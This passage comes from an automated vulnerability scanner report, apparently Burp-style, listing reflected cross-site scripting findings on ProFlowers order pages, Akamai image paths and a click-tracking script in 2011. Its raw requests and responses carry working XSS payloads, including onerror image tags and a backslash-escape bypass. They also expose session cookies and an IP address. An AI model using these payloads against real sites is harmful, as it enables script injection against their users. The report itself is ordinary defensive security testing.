Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/p0074868bb9a40<img src=a onerror=alert(1)>618e53e1f8f

4.166. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a461f<img%20src%3da%20onerror%3dalert(1)>5417133fe9d was submitted in the REST URL parameter 9. This input was echoed as a461f<img src=a onerror=alert(1)>5417133fe9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749ba461f<img%20src%3da%20onerror%3dalert(1)>5417133fe9d?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:30 GMT
Connection: close

Unable to find /ProvideCommerce/p0084749ba461f<img src=a onerror=alert(1)>5417133fe9d

4.167. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ebe78<img%20src%3da%20onerror%3dalert(1)>d7b15d166f5 was submitted in the REST URL parameter 9. This input was echoed as ebe78<img src=a onerror=alert(1)>d7b15d166f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tnebe78<img%20src%3da%20onerror%3dalert(1)>d7b15d166f5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:26 GMT
Connection: close

Unable to find /ProvideCommerce/palepink_tnebe78<img src=a onerror=alert(1)>d7b15d166f5

4.168. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e946f<img%20src%3da%20onerror%3dalert(1)>871e3e70b86 was submitted in the REST URL parameter 9. This input was echoed as e946f<img src=a onerror=alert(1)>871e3e70b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tne946f<img%20src%3da%20onerror%3dalert(1)>871e3e70b86?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:29 GMT
Connection: close

Unable to find /ProvideCommerce/summerchocolates08_tne946f<img src=a onerror=alert(1)>871e3e70b86

4.169. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload caf6c<img%20src%3da%20onerror%3dalert(1)>ef775a487ff was submitted in the REST URL parameter 9. This input was echoed as caf6c<img src=a onerror=alert(1)>ef775a487ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tncaf6c<img%20src%3da%20onerror%3dalert(1)>ef775a487ff?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:18:55 GMT
Connection: close

Unable to find /ProvideCommerce/zinc08_tncaf6c<img src=a onerror=alert(1)>ef775a487ff

4.170. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b464'%3balert(1)//95044cf71dc was submitted in the u parameter. This input was echoed as 8b464';alert(1)//95044cf71dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=8b464'%3balert(1)//95044cf71dc HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CMEacUnu%2BdlVAnlb0EJqADUPwdEWLwFVt1YkusdXa%2FyG4PDMmwT%2Bp04eahs%2BgOi%2BCY9F8sJ1N5rP7C5Tcb6%2BH1tPYzqeBSrsgO%2FIVnhaSvpJm5%2FDT0Ajp8kznUSNzkVywo4QxpKsftt8R5jf0pDOjFkH3uJy8CgNSN5gRv3ZgKClRVzaPtdufl67Wm9PuOAAQRJYlAbyAfeEbfybOFvnJNK26bhsFqut4RfCugAAIH9Thyf7tC%2FaFjZR6%2F4Xe3KWE9CjAfOduuB6WLWUvJbSzsEWNZmsH81p0aGPaG8iWRByF0XMlYG51oqOMDXV2iLvcha3GW5DrzVhwxSGnknALfg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1244
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split('/')[2]){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=0&u=8b464';alert(1)//95044cf71dc';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

4.171. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc107\"%3balert(1)//ec98c73342e was submitted in the trackingpgroup parameter. This input was echoed as fc107\\";alert(1)//ec98c73342e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPCfc107\"%3balert(1)//ec98c73342e&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:27 GMT
Content-Length: 46950


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPCfc107\\";alert(1)//ec98c73342e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.172. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7636d\"%3balert(1)//578657e5ceb was submitted in the trackingpgroup parameter. This input was echoed as 7636d\\";alert(1)//578657e5ceb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_carousel&selectedrelationshipID=428685&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=HPC7636d\"%3balert(1)//578657e5ceb&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:24:55 GMT
Content-Length: 46950


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPC7636d\\";alert(1)//578657e5ceb"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.173. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f840e\"%3balert(1)//9623d7271fc was submitted in the trackingpgroup parameter. This input was echoed as f840e\\";alert(1)//9623d7271fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

POST /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBSf840e\"%3balert(1)//9623d7271fc&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
Origin: https://orders.proflowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE
Content-Length: 8113

SERVERNAME=ORDER01&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JnBK5JoLsH11eKYPAAbCB9J4CE%2BfEs%2B2jrNxmtLrGIH7KjQenTcoo%2F%2BLYNTaHsT3d%2FkIMPksdO3qKV6sxrf%2ByMhJ20SJav0TObp85l31XC5kQm7gF3Y%2FXdlJicN
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:36:44 GMT
Content-Length: 50700


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBSf840e\\";alert(1)//9623d7271fc"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event6";

   if ("" != "") {
       events +
...[SNIP]...

4.174. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb909\"%3balert(1)//3c15789ae2e was submitted in the trackingpgroup parameter. This input was echoed as cb909\\";alert(1)//3c15789ae2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBScb909\"%3balert(1)//3c15789ae2e&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
